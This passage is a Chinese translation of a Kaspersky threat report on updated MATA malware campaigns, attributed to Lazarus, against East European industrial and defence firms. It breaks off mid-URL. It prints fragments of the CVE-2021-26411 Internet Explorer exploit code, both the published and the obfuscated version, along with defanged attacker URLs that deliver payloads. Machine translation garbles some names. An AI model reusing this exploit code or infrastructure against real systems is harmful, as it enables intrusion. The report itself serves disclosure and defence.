更新的 MATA 攻击东欧的工业公司

更新的MATA攻击东欧的工业公司 卡巴斯基GReAT和ICSCERT Contents 攻击检测3 实验室分析.技术细节-第1部分3 初始感染#1：恶意文件4 初始感染＃2：可执行文件6的下载链接 MATA“LLoader”(LLibrary)7MATA验证器7 MataDoor(MATA第4代)9 装载机17 MATA第3代17 偷窃者25 Screenshotter25 凭据窃取者25 EDR/安全绕过工具27 命令文件工具29 事件调查30 技术细节-第2部分。现场分析结果。31 LinuxMATA第3代32 发现32 横向移动32 滥用安全合规解决方案33 滥用反恶意软件解决方案35 有趣的发现36 使用可移动介质进行传播37 MATA第5代40 受害者49 恶意基础设施50 归因50 相同的XOR键50 工作路径和命名方案51 恶意文档中的韩文字体52 威胁演员的时区52 归因犹豫53 结论54 建议54 妥协指标57 执行摘要 2022年9月初，卡巴斯基专家从MATA集群中发现了几起恶意软件，这些恶意软件先前归因于Lazars集团，损害了东欧的国防承包商公司。这项运动一直活跃到2023年5月。扩大我们的研究范围，我们调查并发现了额外的，新的 ，活跃的演员活动与全感染链，包括一个植入物，旨在通过USB记忆棒在空气间隙网络中工作，以及一个LixMATA 后门。 更新的MATA恶意软件通过鱼叉式网络钓鱼技术分发到目标受害者，使用验证器在多个阶段部署恶意软件。该行为者还滥用了受害者在其环境中传播的各种安全和反恶意软件解决方案。新的MATA第3代和第4代对其加密，配置和通信协议进行了多次修改，其中之一似乎是从头开始重写的。新的MATA一代在规避网络限制方面引入了新的功能，允许参与者在受害者的网络中构建复杂的代理链，并创建用于C2（命令和控制）通信的各种通信协议的“堆栈”。 在这项研究中，我们还发现了一种新的MATA变体，我们称之为MATA第5代。这个复杂的恶意软件已经从头开始完全重写，展示了一种先进而复杂的架构，利用可加载和嵌入式模块和插件。MATAge.5能够在不同进程中作为服务和DLL运行。该恶意软件在内部利用进程间通信(IPC)通道，并使用各种命令，使其能够跨各种协议建立代理链-也在受害者的环境中。 欲了解更多信息，请联系：ics-cert@kaspersky.com或intelreports@kaspersky.com 攻击检测 2022年9月，卡巴斯基专家使用卡巴斯基安全网络监控安全解决方案的遥测，检测到与MATA集群相关的几十个以前未知的恶意软件样本。我们在2020年详细介绍了该恶意软件平台，并在过去几年中多次记录了其在APT攻击中的使用情况。 特别是，引起我们注意的恶意软件样本包含字符串，表明该组织可能是攻击的受害者，看起来像是东欧的工业实体。我们立即联系了可能受到攻击的组织，以传达妥协的风险，并分享有关检测到的威胁和当时可用的妥协指标的信息。 一段时间后，我们收到了该组织员工的电话，通知我们他们使用其中一个管理员的帐户检测到与域控制器的连接 ，他们认为这是“可疑的”-有问题的管理员说他没有连接到域控制器。 因此，我们开始调查该组织网络中的一起事件，结果证明这只是一个更大故事的开始 。 实验室分析.技术细节-第1部分 同时，当我们在实验室收集和分析相关遥测数据时，我们意识到该活动已于2022年8月中旬启动。攻击者使用鱼叉式网络钓鱼技术瞄准了几个受害者，而其他人则通过互联网浏览器下载文件而感染了Widows可执行恶意软件。攻击者继续通过电子邮件发送恶意文档，直到9月底。 在分析了每个恶意软件的时间表和功能之后，我们确定了此活动的感染链。尽管由于能见度有限，某些部分仍然未知 ，但我们已经拼凑了大部分感染链。攻击者使用了与以前的MATA集群类似的加载程序，主木马和窃取程序感染链的组合，并更新了每个恶意软件的功能。此外，他们引入了一个过程来验证受感染的受害者，以确保谨慎的恶意软件交付。 攻击者还利用用户模式rootkit来提升权限并绕过端点安全产品。这种增加的复杂性使他们能够在不被检测到的情况下运行并更有效地实现其目标。 初始感染#1：恶意文件 图1感染链 从几名受害者那里，我们观察到演员发送鱼叉式钓鱼文件。我们的调查显示，在某些情况下，攻击者冒充目标组织的合法雇员，表明他们在发动攻击之前进行了广泛的侦察并收集了敏感信息。 引诱文件的内容与目标业务无关。攻击者从互联网上可用的第三方网站获得了文档中的文本。拉撒路早些时候已经在 2020年对国防工业设施的攻击中使用了该策略。 每个文档都包含一个外部链接，用于获取包含漏洞的远程页面。 图2外部链接 根据我们的分析,获取的HTML页面包含一个CVE-2021-26411漏洞,该漏洞先前被Lazarus小组在针对安全研究人员的活动中使用。该漏洞利用代码类似于韩国安全公司Enki之前发布的。这次,琐碎的 添加了混淆，并修改了代码以获取下一阶段的有效负载（在这种情况下是Loader），而不是在内存中生成外壳代码。 漏洞利用代码分析 已发布PoC代码 在这种情况下利用代码 varmap=newMap() varmap=newMap(); varjscript9=getBase(read(addrOf(map),32)) var_j9_c0349d=getBase(read(_aO_bc03c(map),32)); varrpcrt4=getDllBase(jscript9,'rpcrt4.dll') varrpcrt4=_gDB_f03ca(_j9_c0349d,'rpcrt4.dll'); varmsvcrt=getDllBase(jscript9,'msvcrt.dll') var_mss=_gDB_f03ca(_j9_c0349d,'msvcrt.dll'); varntdll=getDllBase(msvcrt,'ntdll.dll') varntdll=_gDB_f03ca(_mss,'ntdll.dll'); varkernelbase=getDllBase(msvcrt,'kernelbase.dll') var_kb=_gDB_f03ca(_mss,'kernelbase.dll'); varVirtualProtect=getProcAddr(kernelbase,'VirtualProtect') var_kk32=_gDB_f03ca(_j9_c0349d,'kernel32.dll'); varLoadLibraryExA=getProcAddr(kernelbase,'LoadLibraryExA') var_vp_aa40fd=_gpA_03fc(_kb,'VirtualProtect'); varxyz=document.createAttribute('xyz')varpaoi=addrOf(xyz) var_llda=_gpA_03fc(_kk32,'LoadLibraryA'); varpatt=read(addrOf(xyz)+0x18,32)var varxyz=document.createAttribute('xyz');var osf_vft=aos() paoi=_aO_bc03c(xyz); varmsg=initRpc()var varpatt=read(_aO_bc03c(xyz)+0x18,32); rpcFree=rpcFree() varosf_vft=aos(); killcfg(rpcrt4) varmsg=initRpc();varrpcFree=rpcFree();killcfg(rpcrt4); 我们观察到了用于获取下一阶段有效负载的几个文件名和URL： 示例#1。var_dN_03fc='TCD702.dll'var_uL_0c42='hxxps://tarzoose[.]com/chagent_sh?_sid=2a854c3df9098019daa886ae6f3ecaaa0&_ts=60054a124ad9c11d2f0afa8f60a3b26f&_agent=32'示例#2。var_dN_f04kcat='TCD702.dll'var_uL_dl049dsa='hxxps://tarzoose[.]com/chagent_sh?_sid=2a854c3df9098019daa886ae6f3ecaaa0&_ts=085aeeb9e8e0698da2f9ba9af0a9d7c9&_agent=64' 示例#3。var_dN_03fc='TCD702.dll'var_uL_0c42='hxxps://beeztrend[.]com/addcart?_prdid=59f9e991161246da90e548e1b3c158385b9b797f2bc54f2873c813960638f2ff&_agent=32'示例#4。var_dN_03fc='KAP008.dll'var_uL_0c42='hxxps://cakeduer[.]com/addcart?_prdid=59f9e991161246da90e548e1b3c158388be410ddb858336ff0ac4ea2538b08bb&_agent=32' 初始感染＃2：可执行文件的下载链接 其中一名受害者被Windows可执行文件类型Downloader入侵。值得注意的是，此恶意软件是由基于Chromium的浏览器获取的，这意味着受害者通过单击恶意链接下载了恶意软件。我们怀疑该行为者通过电子邮件或其他消息传递平台向潜在受害者发送了恶意链接。 此恶意软件具有琐碎的功能，从远程服务器获取有效负载并在0x301字节XOR解密。 ●下载URL:hxxps://zawajonly[.]com/assets/profile.png ●保存路径:%temp%\systemupdate.dat 在生成获取的有效负载后，恶意软件会弹出一条虚假的“SystemUpdateFinished”消息。根据文件名和消息框，我们假设演员欺骗了受害者，认为该程序与合法的系统更新有关。 图3假系统更新消息 MATA"LLoader"(LLibrary) 一些受害者还通过我们之前提到的InternetExplorer漏洞感染了Loader恶意软件。 恶意软件中的重要字符串与1进行XOR。加载器有一个'荷载'具有简单功能的导出函数：从嵌入的URL中获取下一阶段的有效负载并将其保存到TCD701.dat文件。作者将此恶意软件命名为加载器(LLibrary).dll. ●下载URL:hxxps://tarzoose[.]com/fontsupdate?_sid=2a854c3df9098019daa886ae6f3ecaa0&-36i-&_ts=60054a124ad9c11d2f0afa8f60a3b26f&-36i-&_agent=32 ●保存路径:%temp%\TCD701.dat 我们发现了其中的几个加载器。actor维护下一阶段有效载荷的32位和64位版本，并且似乎根据受害者的主机架构提供合适的版本。 ●32位下载URL(MD591995c6813e20aad1a860d3e712787a6):hxxps://合并[.]com/fontsupdate?_sid=f4ac3aabb25e724cc5af9280d07dfd25&_ts=afbeffc40cb8cec0639e6be9eba26c1e&_agent=32 ●64位下载URL(MD5a966668feca72d8dddf3c737d4908a29):hxxps://合并[.]com/fontsupdate?_sid=f4ac3aabb25e724cc5af9280d07dfd25&_ts=afbeffc40c